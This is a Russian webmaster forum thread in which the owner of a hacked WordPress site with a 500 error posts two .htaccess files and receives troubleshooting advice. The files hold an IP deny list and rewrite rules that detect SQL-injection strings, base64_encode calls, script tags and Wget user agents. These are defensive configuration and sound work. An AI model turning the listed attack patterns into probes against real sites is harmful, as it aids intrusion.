SetEnvIF X-CLUSTER-CLIENT-IP "^31\.184\.238\.200$" DenyAccess
SetEnvIF REMOTE_ADDR "^31\.186\.81\.145$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^31\.186\.81\.145$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^31\.186\.81\.145$" DenyAccess
SetEnvIF REMOTE_ADDR "^31\.25\.240\.121$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^31\.25\.240\.121$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^31\.25\.240\.121$" DenyAccess
SetEnvIF REMOTE_ADDR "^37\.130\.227\.133$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^37\.130\.227\.133$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^37\.130\.227\.133$" DenyAccess
SetEnvIF REMOTE_ADDR "^37\.187\.253\.217$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^37\.187\.253\.217$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^37\.187\.253\.217$" DenyAccess
SetEnvIF REMOTE_ADDR "^37\.203\.214\.2$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^37\.203\.214\.2$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^37\.203\.214\.2$" DenyAccess
SetEnvIF REMOTE_ADDR "^45\.42\.91\.42$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^45\.42\.91\.42$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^45\.42\.91\.42$" DenyAccess
SetEnvIF REMOTE_ADDR "^45\.43\.236\.210$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^45\.43\.236\.210$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^45\.43\.236\.210$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.118\.153\.231$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.118\.153\.231$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.118\.153\.231$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.118\.156\.191$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.118\.156\.191$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.118\.156\.191$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.119\.118\.74$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.119\.118\.74$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.119\.118\.74$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.148\.18\.162$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.148\.18\.162$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.148\.18\.162$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.148\.22\.18$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.148\.22\.18$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.148\.22\.18$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.161\.9\.17$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.161\.9\.17$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.161\.9\.17$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.229\.230\.48$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.229\.230\.48$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.229\.230\.48$" DenyAccess
SetEnvIF REMOTE_ADDR "^46\.45\.190\.206$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^46\.45\.190\.206$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^46\.45\.190\.206$" DenyAccess
SetEnvIF REMOTE_ADDR "^5\.153\.233\.130$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^5\.153\.233\.130$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^5\.153\.233\.130$" DenyAccess
SetEnvIF REMOTE_ADDR "^5\.153\.234\.154$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^5\.153\.234\.154$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^5\.153\.234\.154$" DenyAccess
SetEnvIF REMOTE_ADDR "^5\.153\.238\.103$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^5\.153\.238\.103$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^5\.153\.238\.103$" DenyAccess
SetEnvIF REMOTE_ADDR "^5\.157\.84\.17$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^5\.157\.84\.17$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^5\.157\.84\.17$" DenyAccess
SetEnvIF REMOTE_ADDR "^5\.39\.218\.237$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^5\.39\.218\.237$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^5\.39\.218\.237$" DenyAccess
SetEnvIF REMOTE_ADDR "^50\.6\.77\.2$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^50\.6\.77\.2$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^50\.6\.77\.2$" DenyAccess
SetEnvIF REMOTE_ADDR "^50\.63\.196\.28$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^50\.63\.196\.28$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^50\.63\.196\.28$" DenyAccess
SetEnvIF REMOTE_ADDR "^62\.149\.143\.72$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^62\.149\.143\.72$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^62\.149\.143\.72$" DenyAccess
SetEnvIF REMOTE_ADDR "^62\.210\.185\.3$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^62\.210\.185\.3$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^62\.210\.185\.3$" DenyAccess
SetEnvIF REMOTE_ADDR "^62\.219\.191\.232$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^62\.219\.191\.232$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^62\.219\.191\.232$" DenyAccess
SetEnvIF REMOTE_ADDR "^69\.30\.244\.186$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^69\.30\.244\.186$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^69\.30\.244\.186$" DenyAccess
SetEnvIF REMOTE_ADDR "^75\.126\.167\.85$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^75\.126\.167\.85$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^75\.126\.167\.85$" DenyAccess
SetEnvIF REMOTE_ADDR "^77\.121\.250\.20$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^77\.121\.250\.20$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^77\.121\.250\.20$" DenyAccess
SetEnvIF REMOTE_ADDR "^77\.232\.90\.10$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^77\.232\.90\.10$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^77\.232\.90\.10$" DenyAccess
SetEnvIF REMOTE_ADDR "^79\.105\.83\.238$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^79\.105\.83\.238$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^79\.105\.83\.238$" DenyAccess
SetEnvIF REMOTE_ADDR "^81\.169\.144\.135$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^81\.169\.144\.135$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^81\.169\.144\.135$" DenyAccess
SetEnvIF REMOTE_ADDR "^81\.177\.141\.70$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^81\.177\.141\.70$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^81\.177\.141\.70$" DenyAccess
SetEnvIF REMOTE_ADDR "^82\.146\.36\.221$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^82\.146\.36\.221$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^82\.146\.36\.221$" DenyAccess
SetEnvIF REMOTE_ADDR "^85\.252\.49\.19$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^85\.252\.49\.19$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^85\.252\.49\.19$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.195\.11\.119$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.195\.11\.119$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.195\.11\.119$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.200\.12\.132$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.200\.12\.132$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.200\.12\.132$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.200\.12\.26$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.200\.12\.26$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.200\.12\.26$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.200\.12\.4$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.200\.12\.4$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.200\.12\.4$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.200\.12\.55$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.200\.12\.55$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.200\.12\.55$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.208\.99\.2$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.208\.99\.2$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.208\.99\.2$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.144\.164$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.144\.164$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.144\.164$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.144\.212$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.144\.212$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.144\.212$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.145\.155$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.145\.155$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.145\.155$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.145\.219$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.145\.219$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.145\.219$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.145\.250$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.145\.250$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.145\.250$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.146\.121$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.146\.121$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.146\.121$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.146\.165$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.146\.165$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.146\.165$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.146\.36$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.146\.36$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.146\.36$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.147\.155$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.147\.155$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.147\.155$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.147\.165$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.147\.165$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.147\.165$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.147\.238$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.147\.238$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.147\.238$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.210\.147\.78$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.210\.147\.78$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.210\.147\.78$" DenyAccess
SetEnvIF REMOTE_ADDR "^91\.234\.146\.97$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^91\.234\.146\.97$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^91\.234\.146\.97$" DenyAccess
SetEnvIF REMOTE_ADDR "^93\.158\.221\.250$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^93\.158\.221\.250$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^93\.158\.221\.250$" DenyAccess
SetEnvIF REMOTE_ADDR "^93\.179\.69\.55$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^93\.179\.69\.55$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^93\.179\.69\.55$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.23\.250\.199$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.23\.250\.199$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.23\.250\.199$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.242\.239\.162$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.242\.239\.162$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.242\.239\.162$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.73\.146\.178$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.73\.146\.178$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.73\.146\.178$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.73\.148\.188$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.73\.148\.188$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.73\.148\.188$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.73\.148\.218$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.73\.148\.218$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.73\.148\.218$" DenyAccess
SetEnvIF REMOTE_ADDR "^94\.73\.150\.210$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^94\.73\.150\.210$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^94\.73\.150\.210$" DenyAccess
SetEnvIF REMOTE_ADDR "^123\.207\.29\.152$" DenyAccess
SetEnvIF X-FORWARDED-FOR "^123\.207\.29\.152$" DenyAccess
SetEnvIF X-CLUSTER-CLIENT-IP "^123\.207\.29\.152$" DenyAccess
<IfModule mod_rewrite.c>
RewriteEngine On

RewriteRule ^name/?$ /wp-login.php?imh0kduf66zx24i2z2pdz [R,L]

RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
RewriteRule ^adminka/?$ /wp-login.php?imh0kduf66zx24i2z2pdz&redirect_to=/wp-admin/ [R,L]

RewriteRule ^adminka/?$ /wp-admin/?imh0kduf66zx24i2z2pdz [R,L]

RewriteRule ^registraziya/?$ /wp-login.php?imh0kduf66zx24i2z2pdz&action=register [R,L]

RewriteCond %{SCRIPT_FILENAME} !^(.*)admin-ajax\.php
RewriteCond %{HTTP_REFERER} !^(.*)khabirov.com/wp-admin
RewriteCond %{HTTP_REFERER} !^(.*)khabirov.com/wp-login\.php
RewriteCond %{HTTP_REFERER} !^(.*)khabirov.com/name
RewriteCond %{HTTP_REFERER} !^(.*)khabirov.com/adminka
RewriteCond %{HTTP_REFERER} !^(.*)khabirov.com/registraziya
RewriteCond %{QUERY_STRING} !^imh0kduf66zx24i2z2pdz
RewriteCond %{QUERY_STRING} !^action=logout
RewriteCond %{QUERY_STRING} !^action=rp
RewriteCond %{QUERY_STRING} !^action=register
RewriteCond %{QUERY_STRING} !^action=postpass
RewriteCond %{HTTP_COOKIE} !^.*wordpress_logged_in_.*$
RewriteRule ^.*wp-admin/?|^.*wp-login\.php /not_found [R,L]

RewriteCond %{QUERY_STRING} ^loggedout=true
RewriteRule ^.*$ /wp-login.php?imh0kduf66zx24i2z2pdz [R,L]
</IfModule>
# END Better WP Security

# BEGIN WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Вам Сергей я и доступы все свои могу дать.


файл htaccess_hack - уже как то ломали сайт, я его переименовал в тот раз, год назад было вроде как


UPD: Думал штаццес потер а оказывается сохранил. Теперь уже стоит отдельно скачанный


Сообщение отредактировал HRuust: 10 Сентябрь 2017 - 10:22

  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#5 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 10 Сентябрь 2017 - 10:50

У вас и в корневом .htaccess редирект прописан (в самом начале)... Или это изменёный? Если так, покажите, который сейчас стоит.
  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#6 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 10 Сентябрь 2017 - 11:20

У вас и в корневом .htaccess редирект прописан (в самом начале)... Или это изменёный? Если так, покажите, который сейчас стоит.

 

 

В предыдущем посте тот который поставил сволочь хацкер. В данный момент я поставил этот .htaccess:

Options +FollowSymLinks -Indexes

RewriteEngine On

# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
## End - Rewrite rules to block out some common exploits.

#### @RS
# Deny access to php, xml and ini files 
# within components and plugins directories
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_URI} \.php|\.ini|\.xml [NC]
RewriteCond %{REQUEST_URI} \/components\/ [OR]
RewriteCond %{REQUEST_URI} ^\/includes\/|^\/administrator\/includes\/ [OR]
RewriteCond %{REQUEST_URI} \/language\/ [OR]
RewriteCond %{REQUEST_URI} \/libraries\/ [OR]
RewriteCond %{REQUEST_URI} \/modules\/ [OR]
RewriteCond %{REQUEST_URI} \/plugins\/ [OR]
RewriteCond %{REQUEST_URI} \/templates\/ [OR]
RewriteCond %{REQUEST_URI} \/xmlrpc\/
RewriteRule ^(.*)$ index.php [R=404,L]
#### @RS

#### @RS
# Prevent most common SQL-Injections
RewriteCond %{query_string} concat.*\( [NC,OR]
RewriteCond %{query_string} union.*select.*\( [NC,OR]
RewriteCond %{query_string} union.*all.*select [NC]
RewriteRule ^(.*)$ index.php [F,L]
#### @RS

#### @RS
# Block most common hacking tools
SetEnvIf user-agent "Indy Library" stayout=1
SetEnvIf user-agent "libwww-perl" stayout=1
SetEnvIf user-agent "Wget" stayout=1
deny from env=stayout
#### @RS

## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
## End - Custom redirects

##
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root).
##

#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for something within the component folder,
# or for the site root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#


<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4.0[678] no-gzip
BrowserMatch bMSIE !no-gzip !gzip-only-text/html
<ifmodule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_item_include file \.js$
mod_gzip_item_include file \.css$ </ifmodule>
</IfModule>

<IfModule mod_expires.c>
# Enable expiration control
ExpiresActive On

# Default expiration: 1 hour after request
ExpiresDefault "now plus 1 hour"

# CSS and JS expiration: 1 week after request
ExpiresByType text/css "now plus 1 week"
ExpiresByType application/javascript "now plus 1 week"
ExpiresByType application/x-javascript "now plus 1 week"

# Image files expiration: 1 month after request
ExpiresByType image/bmp "now plus 1 month"
ExpiresByType image/gif "now plus 1 month"
ExpiresByType image/jpeg "now plus 1 month"
ExpiresByType image/jp2 "now plus 1 month"
ExpiresByType image/pipeg "now plus 1 month"
ExpiresByType image/png "now plus 1 month"
ExpiresByType image/svg+xml "now plus 1 month"
ExpiresByType image/tiff "now plus 1 month"
ExpiresByType image/vnd.microsoft.icon "now plus 1 month"
ExpiresByType image/x-icon "now plus 1 month"
ExpiresByType image/ico "now plus 1 month"
ExpiresByType image/icon "now plus 1 month"
ExpiresByType text/ico "now plus 1 month"
ExpiresByType application/ico "now plus 1 month"
ExpiresByType image/vnd.wap.wbmp "now plus 1 month"
ExpiresByType application/vnd.wap.wbxml "now plus 1 month"
ExpiresByType application/smil "now plus 1 month"

# Audio files expiration: 1 month after request
ExpiresByType audio/basic "now plus 1 month"
ExpiresByType audio/mid "now plus 1 month"
ExpiresByType audio/midi "now plus 1 month"
ExpiresByType audio/mpeg "now plus 1 month"
ExpiresByType audio/x-aiff "now plus 1 month"
ExpiresByType audio/x-mpegurl "now plus 1 month"
ExpiresByType audio/x-pn-realaudio "now plus 1 month"
ExpiresByType audio/x-wav "now plus 1 month"

# Movie files expiration: 1 month after request
ExpiresByType application/x-shockwave-flash "now plus 1 month"
ExpiresByType x-world/x-vrml "now plus 1 month"
ExpiresByType video/x-msvideo "now plus 1 month"
ExpiresByType video/mpeg "now plus 1 month"
ExpiresByType video/mp4 "now plus 1 month"
ExpiresByType video/quicktime "now plus 1 month"
ExpiresByType video/x-la-asf "now plus 1 month"
ExpiresByType video/x-ms-asf "now plus 1 month"
</IfModule>
########## End - Optimal expiration time

<IfModule mod_headers.c>
<FilesMatch "\.(js|css|xml|gz)$">
Header append Vary: Accept-Encoding
</FilesMatch>
</IfModule>
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
<Files wp-config.php>
# Запрещаем всем доступ к файлу wp-config.php
   order allow,deny 
   deny from all 
 </Files>

<Files .htaccess> 
   order allow,deny 
   deny from all 
 </Files>
AddDefaultCharset utf-8

Сообщение отредактировал HRuust: 10 Сентябрь 2017 - 11:22

  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#7 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 10 Сентябрь 2017 - 16:18

Попробуйте закомментировать самую первую строку.
  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#8 трай

трай

    Свой человек

  • Киберсанты
  • PipPipPipPipPip
  • 716 сообщений
226
Очень хороший
  • Пол:Мужчина

Отправлено 10 Сентябрь 2017 - 16:50

В дополнение, к написанному Сергеем.

 

1. Обратиться в поддержку хостинга.

2. Откатиться - бэкап - если делали.

3. Плагин TAC.

4. Прога айболит - https://revisium.com/ai/

5. Фриланс..


  • 1

#9 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 10 Сентябрь 2017 - 18:16

Попробуйте закомментировать самую первую строку.

 

Поставил символ решетки перед первой строкой, это имели ввиду? Но сайт не работает


  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#10 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 11 Сентябрь 2017 - 03:08

Поставил символ решетки перед первой строкой, это имели ввиду?

Да.

Но сайт не работает

С большой вероятностью, проблема в .htaccess... И он что-то не похож на не изменённый, не считая настроек, которые могли прописать туда установленные плагины. Где вы его взяли?

Попробуйте, для начала, оставить в файле толко это (оригинальное содержимое после установки движка):


# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#11 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 11 Сентябрь 2017 - 03:30

1. Обратиться в поддержку хостинга.
2. Откатиться - бэкап - если делали.
3. Плагин TAC.
4. Прога айболит - https://revisium.com/ai/
5. Фриланс..


Первые две рекомендации очень хорошие. Плагином (3), пока сайт не доступен воспользоваться не получится. Прогой (4) не пользовался, поэтому ничего сказать не могу... Если опробуете, HRuust, отпишитесь, как она. Фриланс (5), если не знакомый исполнитель, то смотря на кого нарвёшся, бывает тоже прописывают в коде свои дела.
  • 1

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#12 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

Отправлено 11 Сентябрь 2017 - 18:03

В дополнение, к написанному Сергеем.   1. Обратиться в поддержку хостинга. 2. Откатиться - бэкап - если делали. 3. Плагин TAC. 4. Прога айболит - https://revisium.com/ai/ 5. Фриланс..

 

Благодарю за рекомендации!

 

Попробуйте, для начала, оставить в файле толко это (оригинальное содержимое после установки движка):

 

Попробовал, та же ошибка

 

Если опробуете, HRuust, отпишитесь, как она. Фриланс (5), если не знакомый исполнитель, то смотря на кого нарвёшся, бывает тоже прописывают в коде свои дела.

 

Поэтому и ищу исполнителя на нашем форуме. другой момент, я писал в стартпосте что технически не получится оплатить одну-две недели фрилансеру, но деньги есть. Репа у меня не бог весть какая на этом форуме, но обманом или чем то нехорошим не замарана слава богу. Если кто возьмется ошибку 500 устранить, без потери данных, тому дам свои пароли и оплачу в теч. одной-двух недель. Может и я бы сам разобрался и устранил проблему в итоге, но времени заниматься совсем нет, а сайт не работает и позиции в поисковиках у него падают.


  • 0

Очень много полезной информации, о том где взять трафик, и как на этом заработать. Другие это продают, я даю бесплатно: http://khabirov.com

 

Сотни тысяч ключевых слов для привлечения трафика здесь!


#13 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Админ

  • Администрация
  • 5 719 сообщений
2 662
Очень хороший
  • Пол:Мужчина

Отправлено 11 Сентябрь 2017 - 18:27

Ещё есть сайты у вас на этом аккаунте хостинга? Возможно, взломан не сайт, а аккаунт на хостинге, и изменения внесены и выше корневой директории.
  • 0

За возрождение нравственности в СМИ
Рекомендовано к изучению: Правила форума
Совершенству нет предела: как цитировать, как копипастить, как вставлять картинки

Кто счастлив, тот и прав. (Л. Н. Толстой)


#14 HRuust

HRuust

    Коммерсант

  • Киберсанты
  • PipPipPipPip
  • 378 сообщений
49
Очень хороший
  • Страна, Город:
    Стерлитамак
  • Пол:Мужчина

